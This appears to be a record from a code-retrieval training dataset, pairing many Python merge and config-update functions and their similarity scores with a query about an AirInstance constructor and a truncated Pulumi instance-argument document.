enumerate(reconciled_space))\n space_feature_mapping[space_name] = dict( (i,space_index[s]) for i,s in enumerate(src_space))\n else:\n raise ValueError, \"Unknown type of space\"\n else:\n self.fileh.copyNode(space_node, newparent=self.spaces)\n space_direct_copy.append(space_name)\n \n if do_datasets:\n for src_ds in ProgressIter(list(other.datasets), label='Copying datasets'):\n dsname = src_ds._v_name\n\n logger.debug(\"Considering dataset '%s'\", dsname)\n if hasattr(self.datasets, dsname):\n logger.warning(\"already had dataset '%s'\", dsname)\n dst_ds = getattr(self.datasets, dsname)\n # Failure to match instance_id is an immediate reject\n if dst_ds._v_attrs.instance_space != src_ds._v_attrs.instance_space:\n raise ValueError, \"Instance identifiers don't match for dataset %s\" % dsname\n # The hardest to handle is the feature data, since we may need to rearrange feature maps\n else:\n instance_space = other.get_DatasetMetadata(dsname)['instance_space']\n self.add_Dataset(dsname, instance_space, other.get_Space(dsname))\n dst_ds = getattr(self.datasets, dsname)\n\n node_names = ['class_data', 'sequence', 'tokenstreams']\n for name in node_names:\n logger.debug('Copying %s',name)\n if hasattr(src_ds, name):\n src_parent = getattr(src_ds, name)\n #TODO: may need to handle incomplete destination nodes\n dst_parent = getattr(dst_ds, name)\n for node in src_parent:\n if hasattr(dst_parent, node._v_name):\n logger.warning(\"already had '%s' in '%s'\", node._v_name, name)\n else:\n self.fileh.copyNode(node, newparent=dst_parent, recursive=True)\n else:\n logger.warning(\"Source does not have '%s'\", name)\n\n logger.debug('Copying feature_data')\n for node in src_ds.feature_data:\n space_name = node._v_name\n if hasattr(dst_ds.feature_data, space_name):\n logger.warning(\"already had '%s' in 'feature_data'\", space_name) \n elif space_name in space_direct_copy:\n # Direct copy the feature data because the destination store did not have this\n # space or had exactly this space\n logger.debug(\"direct copy of '%s' in 'feature_data'\", space_name)\n self.fileh.copyNode(node, newparent=dst_ds.feature_data, recursive=True)\n else:\n ax0 = node.feature_map.read(field='ax0')\n ax1 = node.feature_map.read(field='ax1')\n value = node.feature_map.read(field='value')\n feature_mapping = space_feature_mapping[space_name]\n\n feat_map = [ (i,feature_mapping[j],v) for (i,j,v) in zip(ax0,ax1,value)]\n self.add_FeatureDict(dsname, space_name, feat_map)\n\n \n # TASKS & RESULTS\n def __merge(datum, check):\n logger.debug(\"Copying %s\", datum)\n src_node = getattr(other, datum)\n dst_node = getattr(self, datum)\n for t in ProgressIter(list(src_node), label='Copying %s' % datum):\n logger.debug(\"Considering %s '%s'\", datum, t._v_name)\n\n # Check if the exact result has been previously copied\n if t._v_name in dst_node:\n logger.warn(\"Skipping previous %s: %s\", datum, t._v_name)\n else:\n md = get_metadata(t)\n for i in ignored_md: \n if i in md: \n del md[i]\n # Check for equivalent metadata\n if not allow_duplicate and check(md):\n logger.warn(\"Ignoring duplicate in %s: %s\", datum, str(md))\n else:\n try:\n self.fileh.copyNode(t, newparent=dst_node, recursive=True)\n except tables.NoSuchNodeError:\n logger.critical(\"Damaged node skipped\")\n\n if do_tasksets:\n # Copy entire nodes\n __merge('tasksets', self.has_TaskSet)\n # Now work our way through and check if any weights need updating\n for src in ProgressIter(other.get_TaskSets({}), label='Copying weights'):\n if src.node._v_name in self.tasksets:\n dst = StoredTaskSet(self, getattr(self.tasksets, src.node._v_name))\n else:\n md = dict(src.metadata)\n for i in ignored_md: \n if i in md: \n del md[i]\n dst = self.get_TaskSet(md)\n # sanity check for compatibility\n if len(src.tasks) != len(dst.tasks):\n logger.warning('number of tasks in src and dst do not match; skipping')\n continue\n for i, task in enumerate(src.tasks):\n dst.tasks[i].weights.update(src.tasks[i].weights)\n\n if do_results:\n __merge('results', self.has_TaskSetResult)", "def merge(self, other):\n self._segments.extend(other._segments)\n self._segments.sort()", "def merge(self, other_btree):\n pass", "def merge(self: Dict[str, Arg], argument: Arg):\n dest = argument.destination\n if dest in self:\n self[dest].merge_all(argument)\n return\n self[dest] = argument", "def union(self, other: Catalog) -> Catalog:\n cat = self.copy()\n oth_cp = other.copy()\n\n for k in oth_cp.keys():\n for ver_id, version in oth_cp[k].versions.items():\n cat[k][ver_id] = version\n return cat", "def merge_two_dicts(self, x, y):\n z = x.copy()\n z.update(y)\n return z", "def merge(self, other: \"GraphSet\") -> None:\n if other.name != self.name:\n raise UnmergableGraphSetsException(\n f\"Unable to merge graph with name {other.name} into {self.name}\"\n )\n if other.version != self.version:\n raise UnmergableGraphSetsException(\n f\"Unable to merge graph with version {other.version} into {self.version}\"\n )\n self.start_time = min(self.start_time, other.start_time)\n self.end_time = max(self.end_time, other.end_time)\n self.resources += other.resources\n self._resolve_duplicates()\n self.errors += other.errors\n self.stats.merge(other.stats)", "def _extend(self, other):\n for key, value in list(other.entries.items()):\n self._add_entry(key, value)", "def replace_config(a, b):\n a.update(b)\n return a", "def mergeWith(self, others):", "def extend(self, other_rollout):\n\n assert not self.is_terminal()\n assert all(k in other_rollout.fields for k in self.fields)\n for k, v in other_rollout.data.items():\n self.data[k].extend(v)\n self.last_r = other_rollout.last_r", "def update(self, other):\n self._start = other._start\n self._end = other._end\n self._nodes = {k: v.copy() for k,v in other._nodes.iteritems()}\n self._edges = {k: set(v) for k,v in other._edges.iteritems()}\n self._names = set(other._names)\n self.current = other.current", "def merge(self, other):\n extras = other.difference(self)\n if len(extras) > 0:\n self.update(extras)\n self.reset()\n return True\n return False", "def merge_config(self_config, indict):\n\n self_config.merge(indict)\n patch_config(self_config, indict)", "def merge_working_sets(self, other):\n\n for dist in other.by_key.values(): self.add(dist)\n return self", "def merge_results(self, other_processor):\n if not isinstance(other_processor, self.__class__):\n raise ValueError(f\"Can only extend with another \"\n f\"{self.__class__.__name__} instance.\")\n\n # Where there is overlap, there _should_ be agreement.\n self._evidence_counts.update(other_processor._evidence_counts)\n self._source_counts.update(other_processor._source_counts)\n self._belief_scores.update(other_processor._belief_scores)\n\n # Merge the statement JSONs.\n for k, sj in other_processor.__statement_jsons.items():\n if k not in self.__statement_jsons:\n self.__statement_jsons[k] = sj # This should be most of them\n else:\n # This should only happen rarely.\n for evj in sj['evidence']:\n self.__statement_jsons[k]['evidence'].append(evj)\n\n # Recompile the statements\n self._compile_results()\n return", "def merge_jupyter_config_data(self, config, in_config):\n self.log.debug(f\"\"\"[lite][config][merge] ..... {config}\"\"\")\n self.log.debug(f\"\"\"[lite][config][merge] ..... {in_config}\"\"\")\n\n config = config or {}\n in_config = in_config or {}\n\n for k, v in in_config.items():\n if k in [DISABLED_EXTENSIONS, FEDERATED_EXTENSIONS]:\n config[k] = [*config.get(k, []), *v]\n elif k in [SETTINGS_OVERRIDES]:\n config[k] = config.get(k, {})\n for pkg, pkg_config in v.items():\n config[k][pkg] = config[k].get(pkg, {})\n config[k][pkg].update(pkg_config)\n else:\n config[k] = v\n self.log.debug(f\"\"\"[lite][config][merge] ..... {config}\"\"\")\n return config", "def merge_jupyter_config_data(self, config, in_config):\n self.log.debug(f\"\"\"[lite][config][merge] ..... {config}\"\"\")\n self.log.debug(f\"\"\"[lite][config][merge] ..... {in_config}\"\"\")\n\n config = config or {}\n in_config = in_config or {}\n\n for k, v in in_config.items():\n if k in [DISABLED_EXTENSIONS, FEDERATED_EXTENSIONS]:\n config[k] = [*config.get(k, []), *v]\n elif k in [SETTINGS_OVERRIDES]:\n config[k] = config.get(k, {})\n for pkg, pkg_config in v.items():\n config[k][pkg] = config[k].get(pkg, {})\n config[k][pkg].update(pkg_config)\n else:\n config[k] = v\n self.log.debug(f\"\"\"[lite][config][merge] ..... {config}\"\"\")\n return config", "def merge_content(self, other):\n self.__content += other.__content", "def merge(target, source):\n for key, value in source.items():\n if key not in target:\n target[key] = value\n elif type(target[key]) is dict:\n if key in self.OVERRIDE_ON_EXTENDS:\n target[key].update(value)\n else:\n merge(target[key], value)\n elif type(target[key]) is list:\n target[key] += value\n return target", "def merge(self, new_store):\n if new_store.name and len(new_store.name) > 0:\n self.name = new_store.name\n if new_store.address and len(new_store.address) > 0:\n self.address = new_store.address\n if new_store.city and len(new_store.city) > 0:\n self.city = new_store.city\n if new_store.state and len(new_store.state) > 0:\n self.state = new_store.state\n if new_store.zip and new_store.zip > 0:\n self.zipcode = new_store.zip\n if new_store.phone and new_store.phone > 0:\n self.phone = new_store.phone", "def array_merge(a1, a2, inplace=False, empty_source=False): \n if inplace:\n out = a1\n else:\n out = copy.deepcopy(a1)\n if empty_source:\n for i in range(len(out)):\n out.pop()\n for k in a2:\n out[k] = a2[k]\n return out", "def update(self, other: dict):\n for key in other:\n if key in self:\n self[key] = other[key]", "def merge_graph(self, other):\n self.add_nodes( (nLabel,nInfo) for nLabel,nInfo in other.nodes() )\n \n for nLabel,nInfo in other.nodes():\n for edgeLabel,edgeInfo in other.edgesFrom(nLabel):\n self.add_edge(edgeLabel,edgeInfo)", "def _merge_two_config(user_cfg, default_cfg):\n if type(user_cfg) is not edict:\n return\n for key, val in user_cfg.iteritems():\n # Since user_cfg is a sub-file of default_cfg\n if not default_cfg.has_key(key):\n raise KeyError('{} is not a valid config key'.format(key))\n\n if type(default_cfg[key]) is not type(val):\n if isinstance(default_cfg[key], np.ndarray):\n val = np.array(val, dtype=default_cfg[key].dtype)\n else:\n raise ValueError(\n 'Type mismatch ({} vs. {}) '\n 'for config key: {}'.format(type(default_cfg[key]),\n type(val), key))\n # Recursive merge config\n if type(val) is edict:\n try:\n _merge_two_config(user_cfg[key], default_cfg[key])\n except:\n print 'Error under config key: {}'.format(key)\n raise\n else:\n default_cfg[key] = val", "def merge_nmap_services(d1, d2):\n new = d1['host']['nmap_services_py']\n old = d2['host']['nmap_services_py']\n new_address = new['addresses'][0]\n old['hostnames'].extend(new['hostnames'])\n old['hostnames'] = list(set(old['hostnames']))\n old['addresses'].append(new_address)\n old['addresses'] = list(set(old['addresses']))\n old['services'][new_address] = new['services'][new_address]\n # Ignoring os and uptime as they should not diff.\n if VERBOSE:\n logger.info('Host %s merged in to %s.' % (new_address, d2['host']['name']))\n d2['host']['nmap_services_py'] = old\n return d2", "def merge_annotation(self, other_seg):\n try:\n assert isinstance(other_seg, SFFSegmentation)\n except AssertionError:\n print_date(_encode(u\"Invalid type for other_seg: {}\".format(type(other_seg)), u'utf-8'))\n sys.exit(65)\n # global data\n self.name = other_seg.name\n self.software = other_seg.software\n self.global_external_references = other_seg.global_external_references\n self.details = other_seg.details\n # loop through segments\n for segment in self.segments:\n other_segment = other_seg.segments.get_by_id(segment.id)\n segment.biological_annotation = other_segment.biological_annotation\n segment.complexes_and_macromolecules = other_segment.complexes_and_macromolecules", "def osl_fill_from(self, other):\n #TODO: What about inherited properties?\n for p in self._osl.properties:\n conditional_copy(other, self, p[0])\n return self", "def mergeData(oldData, newData):\n for key, value in newData.iteritems():\n if isinstance(value, (dict,)):\n if key in oldData:\n assert isinstance(oldData[key], ConfigDict), \\\n \"%r in %r is not a ConfigDict\" % (oldData[key], oldData)\n else:\n oldData[key] = {}\n mergeData(oldData[key], value)\n else:\n oldData[key] = value", "def combine(self, existing):\n return self", "def extend(self, other):\n overlap = [key for key in other.defaults if key in self.defaults]\n if overlap:\n raise ValueError(\n \"Duplicate hyperparameter(s): %s\" % \" \".join(overlap))\n new = dict(self.defaults)\n new.update(other.defaults)\n return HyperparameterDefaults(**new)", "def _merge(config, env):\n if 'common' in config and env in config:\n c = config['common'].copy()\n c.update(config[env])\n elif env in config.keys():\n c = config[env]\n elif 'common' in config.keys():\n c = config['common']\n else:\n c = config\n return c", "def updateFromContext(self, other):\n value = self.valueType.set(self.value, other.value)\n self.set(value)\n self.origins.extend(other.origins)", "def merge(self, hps, overwrite=True):\n if isinstance(hps, HyperParameters):\n hps = hps.space\n for hp in hps:\n self._retrieve(\n hp.name,\n hp.__class__.__name__,\n hp.get_config(),\n overwrite=overwrite)", "def merge(self, other: PerfData):\n self.total_samples += other.total_samples\n if self.total_time == 0.0:\n self.total_time = other.total_time\n self.compile_time = max(self.compile_time, other.compile_time)\n self.programming_time = max(\n self.programming_time, other.programming_time\n )\n if self.est_samples_per_sec == 0.0:\n self.est_samples_per_sec = other.est_samples_per_sec\n else:\n assert (\n self.est_samples_per_sec == other.est_samples_per_sec\n ), \"Expected all fabric-based performance estimates to be identical\"\n\n if self.total_time > 0:\n self.samples_per_sec = float(self.total_samples) / self.total_time\n else:\n self.samples_per_sec = 0.0", "def copyDataFrom (self, other):\n\n self.outErrorPackets=other.outErrorPackets\n self._myHasOutErrorPackets=other._myHasOutErrorPackets\n \n self.inErrorPackets=other.inErrorPackets\n self._myHasInErrorPackets=other._myHasInErrorPackets\n \n self.inDiscardPackets=other.inDiscardPackets\n self._myHasInDiscardPackets=other._myHasInDiscardPackets\n \n self.outUnicastPackets=other.outUnicastPackets\n self._myHasOutUnicastPackets=other._myHasOutUnicastPackets\n \n self.inMulticastPackets=other.inMulticastPackets\n self._myHasInMulticastPackets=other._myHasInMulticastPackets\n \n self.outBroadcastPackets=other.outBroadcastPackets\n self._myHasOutBroadcastPackets=other._myHasOutBroadcastPackets\n \n self.inBroadcastPackets=other.inBroadcastPackets\n self._myHasInBroadcastPackets=other._myHasInBroadcastPackets\n \n self.outMulticastPackets=other.outMulticastPackets\n self._myHasOutMulticastPackets=other._myHasOutMulticastPackets\n \n self.inUnknownProtocolPackets=other.inUnknownProtocolPackets\n self._myHasInUnknownProtocolPackets=other._myHasInUnknownProtocolPackets\n \n self.outDiscardPackets=other.outDiscardPackets\n self._myHasOutDiscardPackets=other._myHasOutDiscardPackets\n \n self.inUnicastPackets=other.inUnicastPackets\n self._myHasInUnicastPackets=other._myHasInUnicastPackets\n \n self.outOctets=other.outOctets\n self._myHasOutOctets=other._myHasOutOctets\n \n self.inOctets=other.inOctets\n self._myHasInOctets=other._myHasInOctets", "def merge_datasets(self, other):\r\n if isinstance(other, SpatialDataFrame) and \\\r\n other.geometry_type == self.geometry_type:\r\n return pd.concat(objs=[self, other], axis=0)\r\n elif isinstance(other, DataFrame):\r\n return pd.concat(objs=[self, other], axis=0)\r\n elif isinstance(other, Series):\r\n self['merged_datasets'] = other\r\n elif isinstance(other, SpatialDataFrame) and \\\r\n other.geometry_type != self.geometry_type:\r\n raise ValueError(\"Spatial DataFrames must have the same geometry type.\")\r\n else:\r\n raise ValueError(\"Merge datasets cannot merge types %s\" % type(other))", "def copy(self):\n new = super().copy()\n new.drip_cal_config = deepcopy(self.drip_cal_config)\n new.drip_config = deepcopy(self.drip_config)\n new.pipecal_config = deepcopy(self.pipecal_config)\n return new", "def copyAttributes(self, other, add_nxpars=False):\n import copy\n \n self.setTitle(other.getTitle())\n self.setDataSetType(other.getDataSetType())\n self.setAllAxisLabels(other.getAllAxisLabels())\n self.setAllAxisUnits(other.getAllAxisUnits())\n self.setYLabel(other.getYLabel())\n self.setYUnits(other.getYUnits())\n if len(self.attr_list.keys()) == 0:\n self.attr_list = copy.copy(other.attr_list)\n else:\n self.attr_list.instrument = copy.copy(other.attr_list.instrument)\n self.attr_list.sample = copy.copy(other.attr_list.sample)\n\n if add_nxpars:\n nxpar_keys = [item[0] for item in self.attr_list.iteritems() \\\n if isinstance(item[1], NxParameter)]\n\n for nxpar_key in nxpar_keys:\n self.attr_list[nxpar_key] += other.attr_list[nxpar_key]\n else:\n # Do nothing\n pass\n \n keys_to_get = [other_key for other_key in other.attr_list \\\n if other_key not in self.attr_list]\n \n for key_to_get in keys_to_get:\n self.attr_list[key_to_get] = \\\n copy.copy(other.attr_list[key_to_get])", "def apply_merge_config(\n self, config: str, dry_run: Optional[bool] = True\n ):\n result = self.nornir.run(\n task=self.napalm_config_run,\n name='Merge config to device',\n dry_run=dry_run,\n replace=False,\n configuration=config\n )\n\n # Fix up return Currently == None\n return result", "def merge(self, strn):\n\t\tif strn.name == self.name:\n\t\t\tfor run, val in strn.items():\n\t\t\t\tself.val[run] = val", "def merge(self, a, b, path=None):\n if path is None: path = []\n for key in b:\n if key in a:\n if isinstance(a[key], dict) and isinstance(b[key], dict):\n if key == 'attributes':\n self.merge_attribute_defs(b, a)\n else:\n self.merge(a[key], b[key], path + [str(key)])\n elif a[key] == b[key]:\n pass # same leaf value\n else:\n # raise Exception('Conflict at %s' % '.'.join(path + [str(key)]))\n self.append_or_replace(a,b,key, '/'.join(path + [str(key)]));\n else:\n a[key] = b[key]\n return a", "def merge_struct_arrays(self, data1, data2):\n data_final = np.concatenate((data1, data2))\n return data_final", "def _merge_inplace(self, other):\n if other is None:\n yield\n else:\n # don't include indexes in priority_vars, because we didn't align\n # first\n priority_vars = OrderedDict(\n (k, v) for k, v in self.variables.items() if k not in self.dims)\n variables = merge_coords_without_align(\n [self.variables, other.variables], priority_vars=priority_vars)\n yield\n self._update_coords(variables)", "def PassData(self, other):\n for this,that in zip(self.DataSet, other.DataSet):\n for assoc in [ArrayAssociation.POINT, ArrayAssociation.CELL, ArrayAssociation.ROW]:\n if this.HasAttributes(assoc) and that.HasAttributes(assoc):\n this.GetAttributes(assoc).PassData(that.GetAttributes(assoc))", "def merge_algorithm_configs(\n cls,\n config1: AlgorithmConfigDict,\n config2: PartialAlgorithmConfigDict,\n _allow_unknown_configs: Optional[bool] = None,\n ) -> AlgorithmConfigDict:\n config1 = copy.deepcopy(config1)\n if \"callbacks\" in config2 and type(config2[\"callbacks\"]) is dict:\n deprecation_warning(\n \"callbacks dict interface\",\n \"a class extending rllib.algorithms.callbacks.DefaultCallbacks; \"\n \"see `rllib/examples/custom_metrics_and_callbacks.py` for an example.\",\n error=True,\n )\n\n if _allow_unknown_configs is None:\n _allow_unknown_configs = cls._allow_unknown_configs\n return deep_update(\n config1,\n config2,\n _allow_unknown_configs,\n cls._allow_unknown_subkeys,\n cls._override_all_subkeys_if_type_changes,\n cls._override_all_key_list,\n )", "def combine_dict(self, dict2):\n # iterate through smaller data set\n # base_set will be the larger set and is used for updating\n if len(self.content[\"values\"]) > len(dict2[\"values\"]):\n large_set = self.content[\"values\"]\n small_set = dict2[\"values\"]\n base_set = self.content\n else:\n small_set = self.content[\"values\"]\n large_set = dict2[\"values\"]\n base_set = dict2\n\n subset = {}\n for key in small_set.keys():\n # determine wether to compare keys\n if key in large_set:\n updated_l = large_set[key][\"updated_at\"]\n updated_s = small_set[key][\"updated_at\"]\n if updated_l == 'NULL':\n if updated_s != 'NULL':\n # update to not NULL set\n # if both updated_at are NULL, things\n # are ambiguos. We could defer to created_at\n # but for simplicity we will default to\n # the values in the larger set\n subset[key] = small_set[key]\n else:\n if updated_s == 'NULL':\n # update to not NULL set\n subset[key] = large_set[key]\n else:\n if updated_l > updated_s:\n subset[key] = large_set[key]\n else:\n subset[key] =small_set[key]\n else:\n subset[key] = small_set[key]\n base_set[\"values\"].update(subset)\n new_obj = BackupData()\n new_obj.load_from_dict(base_set)\n return new_obj", "def copy(self, **kwargs):\n # type: (...) -> SalusConfig\n return deepcopy(self).update(**kwargs)", "def extend(self, other):\n if len(self.vertices[0]) != len(other.vertices[0]):\n raise ValueError(\"Rank mismatch ({0} != \"\n \"{1})\".format(self.vertices.shape[1],\n other.vertices.shape[1]))\n if self._geotype != other._geotype:\n raise TypeError(\"Geometry mismatch ({0} != \"\n \"{1})\".format(self._geotype, other._geotype))\n\n self.vertices = np.vstack([self.vertices, other.vertices])\n self._cache = {}\n return self", "def update_inplace_from(self, other):\n self.__dict__ = other.__dict__.copy()", "def merge(self, db2):\n delta_db = Database(db2)\n\n # Find common headers between the master and delta databases\n common_headers = [x for x in self.headers if x in delta_db.headers]\n\n # Any new headers found in the delta are added to the master\n self.headers.extend(\n [x for x in delta_db.headers if x not in self.headers])\n\n if len(common_headers) < 1:\n print(\"No shared headers were found. These files cannot be merged.\")\n else:\n key = ''\n # Skip picker prompt if there is only one common header\n if len(common_headers) == 1:\n key = common_headers[0]\n else:\n key = self.headerpicker(common_headers)\n\n # Create a temp list for new records to be added to\n records_temp = list(self.records)\n\n # Iterate over new records and attempt to match to existing record\n for each in delta_db.records:\n record = self.fetch_record(key, each, records_temp)\n if record:\n record.attributes.update(each.attributes)\n\n self.records = records_temp\n print(\"Merge successful!\\n\")", "def _overwrite_with_config(self, new_cfg):\n for section in new_cfg.sections():\n for key, val in new_cfg.items(section):\n self.config.set(section, key, val)", "def mergeConfig(self):\n config = \\\n \"from Configuration.DataProcessing.Merge import mergeProcess\\nprocess = mergeProcess(\\n \"\n config += \",\".join(self.merge_inputs)\n config += \",\\n\"\n config += \" output_file = \\\"%s\\\",\\n\" % os.path.basename(self.lfn)\n config += \" output_lfn = \\\"%s\\\"\\n) \" % self.lfn\n return config", "def concat(self: TAvalancheDataset, other: TAvalancheDataset) -> TAvalancheDataset:\n return self.__class__([self, other])", "def reset_cfg():\n _C.merge_from_other_cfg(_CFG_DEFAULT)", "def __finalize__(self, other, method=None, **kwargs):\n self = super().__finalize__(other, method=method, **kwargs)\n # merge operation: using metadata of the left object\n if method == \"merge\":\n for name in self._metadata:\n print(\"self\", name, self.au_columns, other.left.au_columns)\n object.__setattr__(self, name, getattr(other.left, name, None))\n # concat operation: using metadata of the first object\n elif method == \"concat\":\n for name in self._metadata:\n object.__setattr__(self, name, getattr(other.objs[0], name, None))\n return self", "def copyDataFrom (self, other):\n\n self.localTimeString=other.localTimeString\n self._myHasLocalTimeString=other._myHasLocalTimeString\n \n self.utcTimeString=other.utcTimeString\n self._myHasUtcTimeString=other._myHasUtcTimeString\n \n self.daylightSavingTime=other.daylightSavingTime\n self._myHasDaylightSavingTime=other._myHasDaylightSavingTime\n \n self.epoch=other.epoch\n self._myHasEpoch=other._myHasEpoch\n \n self.utcOffsetMinutes=other.utcOffsetMinutes\n self._myHasUtcOffsetMinutes=other._myHasUtcOffsetMinutes", "def _merge_a_into_b(a, b):\n if type(a) is not edict:\n return\n\n for k, v in a.iteritems():\n # a must specify keys that are in b\n if not b.has_key(k):\n raise KeyError('{} is not a valid config key'.format(k))\n\n # the types must match, too\n old_type = type(b[k])\n if old_type is not type(v):\n if isinstance(b[k], np.ndarray):\n v = np.array(v, dtype=b[k].dtype)\n else:\n raise ValueError(('Type mismatch ({} vs. {}) '\n 'for config key: {}').format(type(b[k]),\n type(v), k))\n\n # recursively merge dicts\n if type(v) is edict:\n try:\n _merge_a_into_b(a[k], b[k])\n except:\n print('Error under config key: {}'.format(k))\n raise\n else:\n b[k] = v" ]
[ "0.68907833", "0.67463917", "0.6724158", "0.6697968", "0.6695578", "0.66716415", "0.635137", "0.6323535", "0.6313957", "0.628166", "0.62575287", "0.62176895", "0.6143152", "0.611059", "0.61058307", "0.6072944", "0.60497296", "0.5980816", "0.59184533", "0.5873966", "0.5863279", "0.5831473", "0.58241314", "0.57776827", "0.5775701", "0.5771427", "0.5765825", "0.5764409", "0.5756699", "0.5736825", "0.57337356", "0.5708465", "0.5695675", "0.56681585", "0.5659177", "0.56502336", "0.5645864", "0.56340915", "0.5611818", "0.5610291", "0.5605811", "0.5604163", "0.55949205", "0.5590668", "0.55882734", "0.55775195", "0.55645764", "0.5562489", "0.5558372", "0.5554382", "0.5549427", "0.55492955", "0.55491936", "0.55426216", "0.5530909", "0.5520933", "0.5493835", "0.54902756", "0.54728967", "0.54668736", "0.54668736", "0.5463607", "0.5445405", "0.5442351", "0.54243505", "0.5423991", "0.54233426", "0.5421142", "0.54168534", "0.5412695", "0.54085016", "0.5407924", "0.540759", "0.5399552", "0.53993034", "0.53829485", "0.5368911", "0.5355699", "0.53511775", "0.53492343", "0.53402096", "0.53392756", "0.5337514", "0.53341603", "0.53201795", "0.5317996", "0.5315299", "0.52927184", "0.5285277", "0.52833915", "0.5277982", "0.52696407", "0.52485496", "0.52449775", "0.52434385", "0.5234084", "0.5226558", "0.52235574", "0.52089", "0.5208047", "0.52022386" ]
0.0
-1
AirInstance constructor name The name of the instance input An object with the YAML description of the IR instance transmit_handler A function to be called to transmit pkts Add support to allow the specification of the MetaIR instance
def __init__(self, name, input, transmit_handler): local_dir = os.path.dirname(os.path.abspath(__file__)) MetaIRInstance.__init__(self, os.path.join(local_dir, 'air_meta.yml')) self.transmit_handler = transmit_handler self.name = name self.tm_started = False self.disabled = True # Add the content to the MetaIR instance self.add_content(input) self.port_count = self.meta_ir_object_map["layout"]["port_count"] # Create the AIR objects: parsers, actinos, tables, pipelines and TMs self.air_value_set = {} self.air_value_map = {} self.air_parser = {} self.air_action = {} self.air_table = {} self.air_pipeline = {} self.air_traffic_manager = {} self.processors = {} self.transmit_processor = TransmitProcessor(transmit_handler) for name, val in self.value_set.items(): self.air_value_set[name] = [] # Just use a list for name, val in self.value_map.items(): self.air_value_map[name] = {} # Just use a dict for name, val in self.parser.items(): self.air_parser[name] = Parser(name, val, self.parse_state, self.header, self.value_set) self.processors[name] = self.air_parser[name] for name, val in self.action.items(): self.air_action[name] = Action(name, val) for name, val in self.table.items(): self.air_table[name] = Table(name, val, self.air_action) for name, val in self.control_flow.items(): self.air_pipeline[name] = Pipeline(name, val, self.air_table, self.air_action) self.processors[name] = self.air_pipeline[name] for name, val in self.traffic_manager.items(): self.air_traffic_manager[name] = SimpleQueueManager(name, val, self.port_count) self.processors[name] = self.air_traffic_manager[name] # Plumb the layout layout = self.meta_ir_object_map["layout"] meta_ir_assert(layout["format"] == "list", "Unsupported layout: not a list") layout_name_list = layout["implementation"] meta_ir_assert(isinstance(layout_name_list, list), "Layout implementation is not a list") proc_count = len(layout_name_list) for idx, processor_name in enumerate(layout_name_list): cur_proc = self.processors[processor_name] if idx == 0: logging.debug("Layout: First processor %s" % cur_proc.name) self.first_processor = cur_proc if idx < proc_count - 1: next_proc = self.processors[layout_name_list[idx + 1]] cur_proc.next_processor = next_proc else: # Last one connects to transmit processor cur_proc.next_processor = self.transmit_processor logging.debug("Layout %s to %s" % (cur_proc.name, cur_proc.next_processor.name)) # Grab table initialization object if present self.table_initialization = {} ext_objs = self.external_object_map if "table_initialization" in ext_objs.keys(): self.table_initialization = ext_objs["table_initialization"]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n add_on: Optional[pulumi.Input[pulumi.InputType['InstanceAddOnArgs']]] = None,\n availability_zone: Optional[pulumi.Input[str]] = None,\n blueprint_id: Optional[pulumi.Input[str]] = None,\n bundle_id: Optional[pulumi.Input[str]] = None,\n ip_address_type: Optional[pulumi.Input[str]] = None,\n key_pair_name: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n user_data: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n additional_info: Optional[pulumi.Input[str]] = None,\n affinity: Optional[pulumi.Input[str]] = None,\n availability_zone: Optional[pulumi.Input[str]] = None,\n block_device_mappings: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceBlockDeviceMappingArgs']]]] = None,\n cpu_options: Optional[pulumi.Input['InstanceCpuOptionsArgs']] = None,\n credit_specification: Optional[pulumi.Input['InstanceCreditSpecificationArgs']] = None,\n disable_api_termination: Optional[pulumi.Input[bool]] = None,\n ebs_optimized: Optional[pulumi.Input[bool]] = None,\n elastic_gpu_specifications: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceElasticGpuSpecificationArgs']]]] = None,\n elastic_inference_accelerators: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceElasticInferenceAcceleratorArgs']]]] = None,\n enclave_options: Optional[pulumi.Input['InstanceEnclaveOptionsArgs']] = None,\n hibernation_options: Optional[pulumi.Input['InstanceHibernationOptionsArgs']] = None,\n host_id: Optional[pulumi.Input[str]] = None,\n host_resource_group_arn: Optional[pulumi.Input[str]] = None,\n iam_instance_profile: Optional[pulumi.Input[str]] = None,\n image_id: Optional[pulumi.Input[str]] = None,\n instance_initiated_shutdown_behavior: Optional[pulumi.Input[str]] = None,\n instance_type: Optional[pulumi.Input[str]] = None,\n ipv6_address_count: Optional[pulumi.Input[int]] = None,\n ipv6_addresses: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceIpv6AddressArgs']]]] = None,\n kernel_id: Optional[pulumi.Input[str]] = None,\n key_name: Optional[pulumi.Input[str]] = None,\n launch_template: Optional[pulumi.Input['InstanceLaunchTemplateSpecificationArgs']] = None,\n license_specifications: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceLicenseSpecificationArgs']]]] = None,\n monitoring: Optional[pulumi.Input[bool]] = None,\n network_interfaces: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceNetworkInterfaceArgs']]]] = None,\n placement_group_name: Optional[pulumi.Input[str]] = None,\n private_dns_name_options: Optional[pulumi.Input['InstancePrivateDnsNameOptionsArgs']] = None,\n private_ip_address: Optional[pulumi.Input[str]] = None,\n propagate_tags_to_volume_on_creation: Optional[pulumi.Input[bool]] = None,\n ramdisk_id: Optional[pulumi.Input[str]] = None,\n security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n source_dest_check: Optional[pulumi.Input[bool]] = None,\n ssm_associations: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceSsmAssociationArgs']]]] = None,\n subnet_id: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceTagArgs']]]] = None,\n tenancy: Optional[pulumi.Input[str]] = None,\n user_data: Optional[pulumi.Input[str]] = None,\n volumes: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceVolumeArgs']]]] = None):\n if additional_info is not None:\n pulumi.set(__self__, \"additional_info\", additional_info)\n if affinity is not None:\n pulumi.set(__self__, \"affinity\", affinity)\n if availability_zone is not None:\n pulumi.set(__self__, \"availability_zone\", availability_zone)\n if 